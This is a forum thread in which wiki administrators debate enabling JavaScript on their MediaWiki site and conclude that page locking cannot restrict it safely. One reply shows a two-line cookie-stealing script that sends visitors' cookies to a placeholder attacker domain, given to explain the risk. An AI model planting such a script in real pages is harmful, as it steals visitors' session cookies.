Author Topic: Cone bottoms for JamesRL  (Read 10866 times)

Offline Keef

  • Administrator
  • Oil obsessive
  • *****
  • Posts: 552
    • Adur Cooking Oils
  • Location: Sussex

Offline Julian

  • Administrator
  • Oil baron
  • *******
  • Posts: 6392
    • Used Cooking Oil Collection website
  • Location: East Surrey, UK.
Re: Cone bottoms for JamesRL
« Reply #16 on: January 26, 2012, 12:40:42 AM »
I'm not sure page protection is the answer.  If I'm understanding the problem correctly (which is highly unlikely), we want to stop anyone but trusted editors adding code which could be malicious.

I had a little Google and came up with this page ... https://prep09geogebra.pbworks.com/w/page/18304744/Adding%20Javascript%20to%20a%20wiki%20page  I have no idea if it applies to our type of wiki, but is this the sort of thing we need?
Used Cooking Oil Collection website ... http://www.surreyusedcookingoilcollection.palmergroup.co.uk

Offline Keef

  • Administrator
  • Oil obsessive
  • *****
  • Posts: 552
    • Adur Cooking Oils
  • Location: Sussex
Re: Cone bottoms for JamesRL
« Reply #17 on: January 26, 2012, 09:52:05 AM »
I'm pretty sure I don't understand it properly either but surely if you have locked the page so that it can only be edited by an administrator, how can anyone other than administrators add malicious code?

Offline Julian

  • Administrator
  • Oil baron
  • *******
  • Posts: 6392
    • Used Cooking Oil Collection website
  • Location: East Surrey, UK.
Re: Cone bottoms for JamesRL
« Reply #18 on: January 26, 2012, 10:06:03 AM »
I think we need an add on to allow JavaScript.

If that can be applied to selected pages, then you suggestion will work.  If the add on applies to the whole wiki, then it's not really in the wiki sprit to have all the pages locked.

The ideal would be for only admin (for admin, read Tony as he's the only one with the ability to do it) to be able to add the script, which, I think is what the link I posted above is suggesting.

Wish I knew more to be able to progress things!
Used Cooking Oil Collection website ... http://www.surreyusedcookingoilcollection.palmergroup.co.uk

Offline Tony

  • Administrator
  • Oil baron
  • *******
  • Posts: 5114
  • Fo' shizzle, biodizzle
    • Southampton Waste Oil Collection
  • Location: Southampton
Re: Cone bottoms for JamesRL
« Reply #19 on: January 26, 2012, 01:00:46 PM »
There are a couple of ways javascript can be turned on.

By a setting in the configuration file that enables it globally on pages.

By adding an extension like this one to include external javascript files:

http://www.mediawiki.org/wiki/Extension:WikiScript

However, both are global.  Any user making a new page would be able to add random javascript, or include a random offsite javascript file.

An example of why this is bad:

Assuming I am Mr Evil Hacker, I add the following code to any page:

i = new Image();
i.src = 'http://evilhackerssite.com/store_cookie_data?c=' + document.cookie;

Now I get to steal cookies from anyone that visits the page.

Locking individual pages with JS on does not prevent users adding it to any other page.

I had a look at the prep09geogebra plugin but that looks like it's for a specific platform or addon - certainly we don't have any plugin mechanism here.

Offline Tony

  • Administrator
  • Oil baron
  • *******
  • Posts: 5114
  • Fo' shizzle, biodizzle
    • Southampton Waste Oil Collection
  • Location: Southampton
Re: Cone bottoms for JamesRL
« Reply #20 on: January 26, 2012, 01:12:55 PM »
Also, from:

http://www.mediawiki.org/wiki/Extension:Lockdown

Quote
If you need per-page or partial page access restrictions, you are advised to install an appropriate content management package. MediaWiki was not written to provide per-page access restrictions, and almost all hacks or patches promising to add them will likely have flaws somewhere, which could lead to exposure of confidential data. We are not responsible for anything being leaked, leading to loss of funds or one's job.
For further details, see Security issues with authorization extensions

I think we're snookered.

The alternative is to switch from a wiki to a CMS, say MODx (not Joomla *shudder*), and move all 90 articles.  (CMS do allow JS extensions and restrict based on user permissions).

The disadvantage of a CMS is that I don't think it will be easy to cross link all the pages as we do in the wiki.

And of course we'd end up breaking all our external links in from offsite.

Offline Julian

  • Administrator
  • Oil baron
  • *******
  • Posts: 6392
    • Used Cooking Oil Collection website
  • Location: East Surrey, UK.
Re: Cone bottoms for JamesRL
« Reply #21 on: January 26, 2012, 01:15:36 PM »
But Tony, we're relying on you.

I had you down as a chap who could achieve anything internet related with little effort.

There'll be a lot of very upset wiki readers, worldwide if you let us down.

Is there any mechanism which will flag up JavaScript as soon as it's added?  We could then delete  it and ban the user.  Remember, we've already approved all members as being known to us via the VOD, other newcomers don't get editor rights.
Used Cooking Oil Collection website ... http://www.surreyusedcookingoilcollection.palmergroup.co.uk

Offline Julian

  • Administrator
  • Oil baron
  • *******
  • Posts: 6392
    • Used Cooking Oil Collection website
  • Location: East Surrey, UK.
Re: Cone bottoms for JamesRL
« Reply #22 on: January 27, 2012, 12:06:27 AM »
Used Cooking Oil Collection website ... http://www.surreyusedcookingoilcollection.palmergroup.co.uk